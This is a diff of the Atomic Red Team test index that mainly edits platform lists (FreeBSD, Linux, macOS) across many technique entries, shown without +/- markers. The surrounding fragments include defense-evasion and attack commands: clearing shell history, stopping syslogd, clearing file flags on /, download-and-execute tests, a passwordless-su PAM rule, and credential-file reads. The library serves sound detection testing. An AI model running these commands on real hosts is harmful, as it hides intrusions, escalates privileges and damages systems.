@@ -7488,7 +7482,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'ln -sf /dev/null ~/.sh_history
@@ -7512,7 +7506,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'truncate -s0 ~/.sh_history
@@ -7540,7 +7534,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
unset HISTFILE
@@ -7618,7 +7612,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
dependencies:
- description: 'Install sshpass and create user account used for excuting
@@ -7961,7 +7955,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -7999,7 +7992,6 @@ defense-evasion:
description: "Use Perl to decode a base64-encoded text string and echo it to
the console \n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -8067,7 +8059,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
message:
description: Message to print to the screen
@@ -8098,7 +8090,7 @@ defense-evasion:
Also a there is a great Sigma rule [here](https://github.com/SigmaHQ/sigma/blob/master/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml)
for it. \n"
supported_platforms:
- freebsd
- linux
input_arguments:
bash_encoded:
description: Encoded
@@ -8141,7 +8133,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -9755,7 +9746,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -9787,7 +9777,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -9822,7 +9811,6 @@ defense-evasion:
Setting the creation timestamp requires changing the system clock and reverting.
Sudo or root privileges are required to change date. Use with caution.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -9849,7 +9837,6 @@ defense-evasion:
This technique was used by the threat actor Rocke during the compromise of Linux web servers.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -11175,7 +11162,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pfctl is installed on the machine.
@@ -11283,7 +11270,7 @@ defense-evasion:
description: "Add and delete a rule on the Packet Filter (PF) if installed and
enabled. \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if pf is installed on the machine and enabled.
@@ -13706,9 +13693,8 @@ defense-evasion:
Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -13741,9 +13727,8 @@ defense-evasion:
Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
@@ -14938,7 +14923,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
payload:
description: hello.c payload
@@ -14986,7 +14971,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
@@ -15031,7 +15016,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
@@ -15100,7 +15085,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -4000
@@ -15114,7 +15098,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -2000
@@ -16041,7 +16024,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
auditd_config_file_name:
description: The name of the auditd configuration file to be changed
@@ -16105,7 +16088,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
syslog_config_file_name:
description: The name of the syslog configuration file to be changed
@@ -18898,7 +18881,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
evil_command:
description: Command to run after shell history collection is disabled
@@ -18997,7 +18980,7 @@ defense-evasion:
Note: we don't wish to log out, so we are just confirming the value of HISTSIZE. In this test we 1. echo HISTSIZE 2. set it to zero 3. confirm that HISTSIZE is set to zero.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -19036,7 +19019,7 @@ defense-evasion:
Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -20688,7 +20671,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
service syslogd stop
@@ -21582,7 +21565,6 @@ defense-evasion:
as an additional \npayload to the compromised host and to make sure that there
will be no recoverable data due to swap feature of FreeBSD/linux.\n"
supported_platforms:
- freebsd
- linux
executor:
command: "swapon -a \nsleep 2\nswapoff -a\nsync\n"
@@ -22425,7 +22407,7 @@ defense-evasion:
a base64 encoded command, that echoes `Hello from the Atomic Red Team` \nand
uname -v\n"
supported_platforms:
- freebsd
- linux
input_arguments:
shell_command:
description: command to encode
@@ -23742,7 +23724,6 @@ defense-evasion:
Upon successful execution, sh is renamed to `crond` and executed.
supported_platforms:
- freebsd
- linux
executor:
command: |
@@ -24702,7 +24683,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
input_arguments:
cert_filename:
description: Path of the CA certificate we create
@@ -25021,7 +25002,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -25053,7 +25033,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -25084,7 +25063,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -27350,7 +27328,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -27388,7 +27365,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -27577,7 +27553,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
chflags -R 0 /
@@ -28397,7 +28373,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
command: "mkdir -p /tmp/atomic-test-T1036.006\ncd /tmp/atomic-test-T1036.006\nmkdir
@@ -29406,7 +29382,6 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -31261,7 +31236,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -31302,7 +31277,7 @@ defense-evasion:
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -31344,7 +31319,7 @@ defense-evasion:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -33926,7 +33901,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -33965,7 +33940,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -34004,7 +33979,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if sudo is installed.
@@ -35196,9 +35171,8 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -35256,7 +35230,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
command:
description: Command to execute
@@ -38063,7 +38037,7 @@ privilege-escalation:
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
@@ -38106,7 +38080,7 @@ privilege-escalation:
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
@@ -38865,7 +38839,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
payload:
description: hello.c payload
@@ -38913,7 +38887,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetUID flag
@@ -38958,7 +38932,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
file_to_setuid:
description: Path of file to set SetGID flag
@@ -39027,7 +39001,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -4000
@@ -39041,7 +39014,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'find /usr/bin -perm -2000
@@ -43596,7 +43568,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
@@ -43617,7 +43589,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -43640,7 +43611,6 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -45568,7 +45538,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -45864,7 +45834,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
@@ -47322,7 +47292,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
@@ -47866,7 +47836,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -47907,7 +47877,7 @@ privilege-escalation:
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -47949,7 +47919,7 @@ privilege-escalation:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -50010,9 +49980,8 @@ execution:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -50070,7 +50039,7 @@ execution:
'
supported_platforms:
- freebsd
- linux
input_arguments:
command:
description: Command to execute
@@ -53084,7 +53053,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -53109,7 +53077,6 @@ execution:
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -53203,7 +53170,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -53223,7 +53189,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -53241,7 +53206,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -53256,7 +53220,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
@@ -53290,7 +53253,7 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -53337,7 +53300,7 @@ execution:
with a /bin/sh shell, changes the users shell to sh, then deletes the art
user. \n"
supported_platforms:
- freebsd
- linux
dependencies:
- description: 'chsh - change login shell, must be installed
@@ -53389,7 +53352,7 @@ execution:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
@@ -53450,7 +53413,7 @@ execution:
'
supported_platforms:
- freebsd
- linux
input_arguments:
remote_url:
description: url of remote payload
@@ -54089,7 +54052,6 @@ execution:
description: Download and execute shell script and write to file then execute
locally using Python -c (command mode)
supported_platforms:
- freebsd
- linux
input_arguments:
script_url:
@@ -54131,7 +54093,6 @@ execution:
description: Create Python file (.py) that downloads and executes shell script
via executor arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -54189,7 +54150,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -54254,7 +54214,6 @@ execution:
'
supported_platforms:
- freebsd
- linux
dependencies:
- description: 'Verify if python is in the environment variable path and attempt
@@ -55573,7 +55532,7 @@ execution:
'
supported_platforms:
- freebsd
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
@@ -56632,7 +56591,7 @@ persistence:
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
@@ -58667,9 +58626,8 @@ persistence:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -58727,7 +58685,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
command:
description: Command to execute
@@ -60348,7 +60306,6 @@ persistence:
description: Turn on Chrome/Chromium developer mode and Load Extension found
in the src directory
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -60366,7 +60323,6 @@ persistence:
auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f
description: Install the "Minimum Viable Malicious Extension" Chrome extension
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -60383,7 +60339,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
- windows
- macos
@@ -62672,7 +62627,7 @@ persistence:
Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
@@ -62715,7 +62670,7 @@ persistence:
Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if bash is installed.
@@ -63061,7 +63016,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
username:
description: Username of the user to create
@@ -63184,7 +63139,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
username:
description: Username of the user to create
@@ -64042,9 +63997,8 @@ persistence:
persistence on victim host. \nIf the user is able to save the same contents
in the authorized_keys file, it shows user can modify the file.\n"
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
name: sh
elevation_required: false
@@ -70371,7 +70325,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
command_to_add:
description: Command to add to the .shrc file
@@ -70392,7 +70346,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -70415,7 +70368,6 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
text_to_append:
@@ -72694,7 +72646,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -73032,7 +72984,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
rc_service_path:
description: Path to rc service file
@@ -74533,7 +74485,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
input_arguments:
time_spec:
description: Time specification of when the command should run
@@ -75168,7 +75120,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -75209,7 +75161,7 @@ persistence:
the account, try to su to art and fail, unlock and renew the account, su successfully,
then delete the account.\n"
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -75251,7 +75203,7 @@ persistence:
'
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -75631,7 +75583,7 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
input_arguments:
destination_url:
description: Destination URL to post encoded data.
@@ -77896,7 +77848,7 @@ command-and-control:
with add-ons in order to provide onion routing functionality.\nUpon successful
execution, the tor proxy service will be launched. \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: "Tor must be installed on the machine \n"
@@ -78050,7 +78002,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -78810,7 +78761,6 @@ command-and-control:
This test simulates an infected host beaconing to command and control.
Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/master/test-sets/command-and-control/malicious-user-agents.bat
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -78899,7 +78849,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -78939,7 +78888,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -78978,7 +78926,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -79009,7 +78956,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -79040,7 +78986,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -79071,7 +79016,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -79280,7 +79224,6 @@ command-and-control:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -79937,9 +79880,8 @@ command-and-control:
Note that this test may conflict with pre-existing system configuration.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
proxy_server:
description: Proxy server URL (host:port)
@@ -80502,7 +80444,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -80532,7 +80473,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -80569,9 +80509,8 @@ collection:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
test_folder:
description: Path used to store files.
@@ -80789,7 +80728,7 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Output file path
@@ -80851,7 +80790,7 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Output file path
@@ -81207,7 +81146,7 @@ collection:
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
@@ -81241,7 +81180,6 @@ collection:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -81828,7 +81766,7 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Location to save downloaded discovery.bat file
@@ -82719,7 +82657,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -82756,7 +82693,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -82793,7 +82729,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -82830,7 +82765,6 @@ collection:
'
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_input_file:
@@ -87659,7 +87593,7 @@ credential-access:
Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
supported_platforms:
- freebsd
- linux
input_arguments:
path_to_pam_conf:
description: PAM config file to modify.
@@ -87935,7 +87869,7 @@ credential-access:
syslog.\n\nTo gain persistence the command could be added to the users .shrc
or .profile \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: 'This test requires to be run in a bash shell and that logger
@@ -87969,7 +87903,6 @@ credential-access:
persistence the command could be added to the users .bashrc or .bash_aliases
or the systems default .bashrc in /etc/skel/ \n"
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -88448,7 +88381,7 @@ credential-access:
the sudo_bruteforce.sh which brute force guesses the password, then deletes
the user\n"
supported_platforms:
- freebsd
- linux
input_arguments:
remote_url:
description: url of remote payload
@@ -90117,7 +90050,7 @@ credential-access:
copy process memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -90162,7 +90095,6 @@ credential-access:
copy a process's heap memory to an external file so it can be searched or exfiltrated later.
On FreeBSD procfs must be mounted.
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -90468,7 +90400,7 @@ credential-access:
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- freebsd
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
@@ -90706,7 +90638,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
@@ -90747,7 +90679,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
@@ -92871,9 +92803,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
search_path:
description: Path where to start searching from.
@@ -92924,7 +92855,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
search_path:
description: Path where to start searching from.
@@ -92986,7 +92917,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
search_path:
description: Path where to start searching from.
@@ -93048,7 +92979,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
search_path:
description: Path where to start searching from
@@ -95022,7 +94953,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -95128,7 +95059,6 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
input_arguments:
@@ -95158,9 +95088,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -95204,9 +95133,8 @@ credential-access:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_path:
description: Path to search
@@ -96457,7 +96385,7 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
target_host:
description: IP Address / Hostname you want to target.
@@ -97138,7 +97066,7 @@ credential-access:
auto_generated_guid: 5076874f-a8e6-4077-8ace-9e5ab54114a5
description: "/etc/master.passwd file is accessed in FreeBSD environments\n"
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -97157,7 +97085,6 @@ credential-access:
auto_generated_guid: 60e860b6-8ae6-49db-ad07-5e73edd88f5d
description: "/etc/passwd file is accessed in FreeBSD and Linux environments\n"
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -97179,7 +97106,6 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -97203,7 +97129,6 @@ credential-access:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -99059,7 +98984,6 @@ discovery:
Upon successful execution, sh will stdout list of usernames.
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -100288,7 +100212,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -100307,7 +100230,6 @@ discovery:
auto_generated_guid: fed9be70-0186-4bde-9f8a-20945f9370c2
description: "(requires root)\n"
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -100331,7 +100253,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -100354,7 +100275,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -100411,7 +100331,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed
@@ -100431,7 +100351,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -100614,7 +100533,7 @@ discovery:
Detects execution in a virtualized environment.
At boot, dmesg stores a log if a hypervisor is detected.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
@@ -101153,7 +101072,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'service -e
@@ -101283,7 +101202,7 @@ discovery:
Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- freebsd
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
@@ -101521,7 +101440,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
@@ -101562,7 +101481,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
@@ -101861,7 +101780,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
package_checker:
description: Package checking command. pkg info -x samba
@@ -102197,7 +102116,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -102258,7 +102176,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat | grep -i "vmm"
@@ -102283,7 +102201,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
- macos
executor:
@@ -102357,9 +102274,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'env
@@ -102588,7 +102504,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
executor:
command: |
kldstat
@@ -103128,7 +103044,6 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
@@ -103193,7 +103108,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
input_arguments:
output_file:
description: Path where captured results will be placed.
@@ -103405,7 +103320,7 @@ discovery:
Upon successful execution, sh will spawn multiple commands and output will be via stdout.
supported_platforms:
- freebsd
- linux
executor:
command: |
if [ -x "$(command -v arp)" ]; then arp -a; else echo "arp is missing from the machine. skipping..."; fi;
@@ -104003,9 +103918,8 @@ discovery:
https://perishablepress.com/list-files-folders-recursively-terminal/
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -104031,9 +103945,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
output_file:
description: Output file used to store the results.
@@ -104225,7 +104138,6 @@ discovery:
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -104575,7 +104487,6 @@ discovery:
Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -104793,9 +104704,8 @@ discovery:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: |
if [ -x "$(command -v dscacheutil)" ]; then dscacheutil -q group; else echo "dscacheutil is missing from the machine. skipping..."; fi;
@@ -105024,7 +104934,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'cat /etc/pam.d/passwd
@@ -105305,7 +105215,6 @@ discovery:
Upon successful execution, the output will contain the environment variables that indicate
the 5 character locale that can be looked up to correlate the language and territory.
supported_platforms:
- freebsd
- linux
executor:
command: 'locale
@@ -105363,7 +105272,6 @@ discovery:
also used as a builtin command that does not generate syscall telemetry but
does provide a list of the environment variables.
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
@@ -105739,7 +105647,7 @@ discovery:
Methods to identify Security Software on an endpoint
when sucessfully executed, command shell is going to display AV/Security software it is running.
supported_platforms:
- freebsd
- linux
executor:
command: 'pgrep -l ''bareos-fd|icinga2|cbagentd|wazuh-agent|packetbeat|filebeat|osqueryd''
@@ -106104,7 +106012,6 @@ discovery:
Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -106130,7 +106037,6 @@ discovery:
Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -106324,7 +106230,7 @@ discovery:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'netstat -r | grep default
@@ -106603,7 +106509,7 @@ discovery:
Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- freebsd
- linux
input_arguments:
host:
description: Host to scan.
@@ -107186,7 +107092,7 @@ discovery:
description: "Identify system time. Upon execution, the local computer system
time and timezone will be displayed. \n"
supported_platforms:
- freebsd
- linux
- macos
executor:
command: 'date
@@ -113671,7 +113577,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
pwd_for_encrypted_file:
@@ -113717,7 +113622,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
pwd_for_encrypted_file:
@@ -113756,7 +113660,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
cped_file_path:
@@ -113807,7 +113710,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
input_arguments:
private_key_path:
@@ -114349,9 +114251,8 @@ impact:
This test simulates a high CPU load as you might observe during cryptojacking attacks.
End the test by using CTRL/CMD+C to break.
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'yes > /dev/null
@@ -114549,7 +114450,6 @@ impact:
Overwrites and deletes a file using DD.
To stop the test, break the command with CTRL/CMD+C.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -115231,9 +115131,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to restart (can be minutes or specific time)
@@ -115251,9 +115150,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
timeout:
description: Time to shutdown (can be minutes or specific time)
@@ -115271,9 +115169,8 @@ impact:
'
supported_platforms:
- freebsd
- macos
- linux
- macos
executor:
command: 'reboot
@@ -115286,7 +115183,6 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'halt -p
@@ -115300,7 +115196,7 @@ impact:
'
supported_platforms:
- freebsd
- linux
executor:
command: 'halt -r
